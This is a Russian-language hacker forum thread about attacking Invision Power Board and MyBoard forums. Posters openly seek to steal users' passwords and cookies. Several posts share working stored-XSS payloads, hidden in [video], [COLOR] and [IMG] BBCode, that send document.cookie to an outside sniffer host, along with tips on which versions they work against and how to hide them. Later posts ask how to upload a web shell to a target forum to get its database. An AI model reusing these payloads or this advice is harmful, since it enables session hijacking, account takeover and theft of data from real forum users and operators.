Вопрос про уязвимости в Invision Power Board(U) v1.3 Final

Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.
Русский Модифицированный IPB v1.3 Final © 2003 BesTFileZ.Net & IBR Team


На таких форумах баги есть ???
надо вытащиьт пароль юзера (хоть в хэше)

 

Ура! я нашёл эту тему у вас.... мне хотелось бы найти информацию по этой версии... хоть чтонибуть. спасибо.

 

Давече в логах снифера видел куки с такоко форома ...
Обыскался куда туда можно вставить скрипт снифера ... не нашёл ... подскажите кто знает ...

 

2 Майор
А где это форум???
Ссылку дай!

 

из того форума скрипт потёрли сразу ...
но вот ещё один :
http://offklan.lamkam.net/forum/index.php?showtopic=26 (на этой стронице скрипт)

вот пост :
<!-- THE POST 152 -->
<div class='postcolor'> <embed width="400" height="300" src=http://1.ru e=` type="application/x-shockwave-video">` style=display:none;background:url(javascript:document.images[12].src=&quot;http://antichat.ru/cgi-bin/s.jpg?&quot;+document.cookie) <i>А</i> если я буду писать раз в неделю нормально будет ? </div>
<!-- THE POST -->
ща буду разбираться ..... , кстате объясните кто знает, что значит символ "`" в html (мне кажется что это что то типо "goto" в С++ ) ???

 

Вот так выглядит скрипт :

[video]http://1.ru e=` [/video]` style=display:none;background:url(javascript:document.images[10].src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie) No smoking

"No smoking" - в место это текст
Если в 10 кодировке зделать, то ваще без палева

 

Это значит что форум взломан =))) молодец чувак! Уважуха!

 

вот только не навсех пашет =\... почему? уже пропатчены? версия таже... хмммм...

 

Например тут непашет =\ http://www.overdose.ru/forum/index.php

 

Там просто отключены теги вставления видео, картинок в пост, причём в некоторых форумах кнопка на тегу [video] убрана, но она работает...

 

всё я просёк на каких пашет. Должнабыть приписка


MyBoard 1.3.0.9.142 © 2004 Elvis271 & 3DT


я же пользовался вот так:

[video]http://1.ru e=`[/video]` style=display:none;background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)

 

Блин, нада уязвимость на IPB 1.3.1 Final Rus
Ничё из нета ненадыбал. Всё пропатчено. Походу идеальный форум, но таких ведь небывает!!! Кто чё знает хелп плиз

 

Является одним из самых защищенных форумов на сегодняшний день. Багов в 1.3.1 я сам не видел, и в нете постов тоже не замечал. Поэтому и юзаю этот форум =)

 

Ревята срочно нужна помащ в

Code:

Powered by Invision Power Board(U) v1.2 © 2003  IPS, Inc.
Русский Модифицированный IPB v1.2 © 2003 BesTFileZ.Net

эта бага сработала на ура (к стате респест Algol`у за находку)

PHP:

[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) [/COLOR]


вот толко форум там мёртвый так что куки админа хрен даждешся , а мне их база розарез нужна. ножет подскажите как туда шелл залить

 

Никак,если ты не имеешь кеша админа или модера.

 

А как модератор шел залить может ?